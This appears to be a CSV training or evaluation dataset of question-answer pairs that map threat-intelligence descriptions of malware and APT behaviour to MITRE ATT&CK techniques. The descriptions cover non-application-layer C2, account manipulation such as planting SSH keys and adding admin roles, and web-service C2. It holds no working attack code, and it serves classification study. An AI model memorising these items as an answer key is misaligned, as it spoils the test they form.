+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has used TCP for C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used Metasploit Bind and Reverse TCP stagers.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used TCP for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metador has used TCP for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has used the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used a passive backdoor that receives commands with UDP packets.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor has used ICMP in C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has used TCP in C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer can use TCP to communicate with command and control servers.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BUBBLEWRAP can communicate using SOCKS.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has a command built in to use a raw TCP socket.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has used raw sockets for network communication.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has the ability to use TCP for external C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER uses ICMP for transmitting configuration information to and from its command and control server.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon uses TCP and UDP for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has the ability to use TCP and UDP for communication.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can be configured to use TCP, ICMP, and UDP for C2 communications.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson uses a custom TCP protocol for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cryptoistic can use TCP in communications with C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi binds to a raw socket on a random source port between 31800 and 31900 for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub can use TCP to communicate between its agent and client modules.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some variants of FakeM use SSL to communicate with C2 servers.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can communicate with C2 over TCP and UDP.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium has the ability to use TCP and UDP in C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp communicates with a simple network protocol over TCP.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has used TCP to download additional modules.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYPLUG can use TCP and KCP (KERN Communications Protocol) over UDP for C2 communication.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LITTLELAMB.WOOLTEA can function as a stand-alone backdoor communicating over the `/tmp/clientsDownload.sock` socket.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack uses a custom binary protocol over sockets for C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa has used a custom JSON-based protocol for its C&C communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can use raw TCP for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used raw TCP for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type network traffic can communicate over a raw socket.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat network traffic communicates over a raw socket.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind completes network communication via raw sockets.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic supports WebSocket and TCP-based C2 profiles.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If NETEAGLE does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, NETEAGLE will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can use TCP in C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can use TCP in C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can forward TCP packets between the C2 and a remote host.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has used a custom binary protocol over port 443 for C2 traffic.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PHOREAL communicates via ICMP for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pay2Key has sent its public key to the C2 server over TCP.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Penquin C2 mechanism is based on TCP and UDP packets.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull variants have the ability to communicate with C2 servers using ICMP or TCP.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The PipeMon communication module can use a custom protocol based on TLS over TCP.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX can be configured to use raw TCP or UDP for command and control.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETEXIT can establish a TCP connection as part of its initial connection to the C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability use TCP to send or receive C2 packets.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can use TCP for C2 communication.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RARSTONE uses SSL to encrypt its communication with its C2 server.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession has the ability to use TCP and UDP in C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use TCP in C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Reaver variants use raw TCP for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Regin malware platform can use ICMP to communicate between infected computers.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec is capable of using ICMP, TCP, and UDP for C2.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro uses a custom binary protocol using a type, length, value format over TCP.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal establishes a TCP socket for C2 communication using the API `WSASocketW`.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to communicate with C2 with TCP over port 443.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARUSH has used TCP for C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can use a proxy module to forward TCP packets to external hosts.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic can communicate with actor-controlled C2 servers by using a custom little-endian binary protocol.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has used UDP for C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has the ability to use TCP sockets to send data and ICMP to ping the C2 server.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie can use ICMP to receive information on the destination server.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can use TCP for C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Umbreon provides access to the system via SSH or any other protocol that uses PAM to authenticate.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can communicate through custom methodologies for UDP, ICMP, and TCP that use distinct sessions to ride over the legitimate protocols.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINDSHIELD C2 traffic can communicate via TCP raw sockets.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can communicate with its C2 server via TCP over port 5200.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMail can use TCP for C2 communications.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Linux has used ICMP, custom TCP, and UDP in outbound communications.","Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can communicate using custom TCP.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIPLINE can communicate with C2 using a custom binary protocol.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has used an encrypted protocol within TCP segments to communicate with the C2.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can establish an indirect and raw TCP socket-based connection to the C2 server.,"Tecnique: T1095 Non-Application Layer Protocol, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used the `sp_addlinkedsrvlogin` command in MS-SQL to create a link between a created account and other servers in the network.","Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has been known to add created accounts to local admin groups to maintain elevated access.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has added user accounts to the User and Admin groups.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has created their own accounts with Local Administrator privileges to maintain access to systems with short-cycle credential rotation.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has added newly created accounts to the administrators group to maintain elevated access.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has assigned newly created accounts the sysadmin role to maintain persistence.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has granted privileges to domain accounts.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has added accounts to specific groups with net localgroup.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has added a user named DefaultAccount to the Administrators and Remote Desktop Users groups.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto adds permissions and remote logins to all users.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate elevates accounts created through the malware to the local administration group during execution.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The LSADUMP::ChangeNTLM and LSADUMP::SetNTLM modules can also manipulate the password hash of an account without knowing the clear text value.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has added user accounts to local Admin groups.,"Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper has added a user named ""supportaccount"" to the Remote Desktop Users and Administrators groups.","Tecnique: T1098 Account Manipulation, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used aws_consoler to create temporary federated credentials for fake users in order to obfuscate which AWS credential is compromised and enable pivoting from the AWS CLI to console sessions without MFA.","Tecnique: T1098.001 Account Manipulation: Additional Cloud Credentials, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 added credentials to OAuth Applications and Service Principals.","Tecnique: T1098.001 Account Manipulation: Additional Cloud Credentials, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can generate SSH and API keys for AWS infrastructure and additional API keys for other IAM users.,"Tecnique: T1098.001 Account Manipulation: Additional Cloud Credentials, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 added their own devices as allowed IDs for active sync using `Set-CASMailbox`, allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.","Tecnique: T1098.002 Account Manipulation: Additional Email Delegate Permissions, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used a Powershell cmdlet to grant the ApplicationImpersonation role to a compromised account.,"Tecnique: T1098.002 Account Manipulation: Additional Email Delegate Permissions, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with `ApplicationImpersonation` rights to start collecting emails from targeted mailboxes; APT29 has also used compromised accounts holding `ApplicationImpersonation` rights in Exchange to collect emails.,"Tecnique: T1098.002 Account Manipulation: Additional Email Delegate Permissions, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations.,"Tecnique: T1098.002 Account Manipulation: Additional Email Delegate Permissions, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used IAM manipulation to gain persistence and to assume or elevate privileges.","Tecnique: T1098.003 Account Manipulation: Additional Cloud Roles, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 granted `company administrator` privileges to a newly created service principle.","Tecnique: T1098.003 Account Manipulation: Additional Cloud Roles, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has added the global admin role to accounts they have created in the targeted organization's cloud instances.,"Tecnique: T1098.003 Account Manipulation: Additional Cloud Roles, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used IAM manipulation to gain persistence and to assume or elevate privileges.
+
+Scattered Spider has also assigned user access admin roles in order to gain Tenant Root Group management permissions in Azure.","Tecnique: T1098.003 Account Manipulation: Additional Cloud Roles, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH.,"Tecnique: T1098.004 Account Manipulation: SSH Authorized Keys, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has added RSA keys in authorized_keys.,"Tecnique: T1098.004 Account Manipulation: SSH Authorized Keys, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore creates a new key pair with ssh-keygen and drops the newly created user key in authorized_keys to enable remote login.,"Tecnique: T1098.004 Account Manipulation: SSH Authorized Keys, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has the ability to add the public key of its handlers to the authorized_keys file to maintain persistence on an infected host.,"Tecnique: T1098.004 Account Manipulation: SSH Authorized Keys, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET will create an ssh key if necessary with the ssh-keygen -t rsa -f $HOME/.ssh/id_rsa -P command. XCSSET will upload a private key file to the server to remotely access the host without a password.,"Tecnique: T1098.004 Account Manipulation: SSH Authorized Keys, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider registered devices for MFA to maintain persistence through victims' VPN.","Tecnique: T1098.005 Account Manipulation: Device Registration, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 registered devices in order to enable mailbox syncing via the `Set-CASMailbox` command.","Tecnique: T1098.005 Account Manipulation: Device Registration, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has enrolled their own devices into compromised cloud tenants, including enrolling a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account.","Tecnique: T1098.005 Account Manipulation: Device Registration, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can register a device to Azure AD.,"Tecnique: T1098.005 Account Manipulation: Device Registration, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used the Cloudflare services for C2 communications.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider downloaded tools from sites including file.io, GitHub, and paste.ee.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Spalax, the threat actors used OneDrive and MediaFire to host payloads.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used Dropbox, Amazon S3, and Google Drive to host malicious downloads.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used Pastebin and Google Storage to host content for their operations.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used sslip.io, a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used Amazon Web Services to host C2.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used GitHub to host its payloads to operate spam campaigns.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used DropBox URLs to deliver variants of PlugX.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has used Pastebin, Gitee, and GitLab for Command and Control.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has leveraged iplogger.org to send collected data back to C2.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can be utilized to abuse `sslip.io`, a free IP to domain mapping service, as part of actor-controlled C2 channels.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar downloads have been hosted on Google Docs.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can download files from Dropbox using a hardcoded access token.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use legitimate websites for external C2 channels including Slack, Discord, and MS Teams.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has been downloaded to victim's machines from OneDrive.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon can use Pastebin to receive C2 commands.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can download additional modules from actor-controlled Amazon S3 buckets.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can retrieve its primary payload from public sites such as Pastebin and Textbin.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has used the dogechain.info API to generate a C2 address.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DropBook can communicate with its operators by exploiting the Simplenote, DropBox, and the social media platform, Facebook, where it can create fake accounts to control the backdoor and receive instructions.","Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
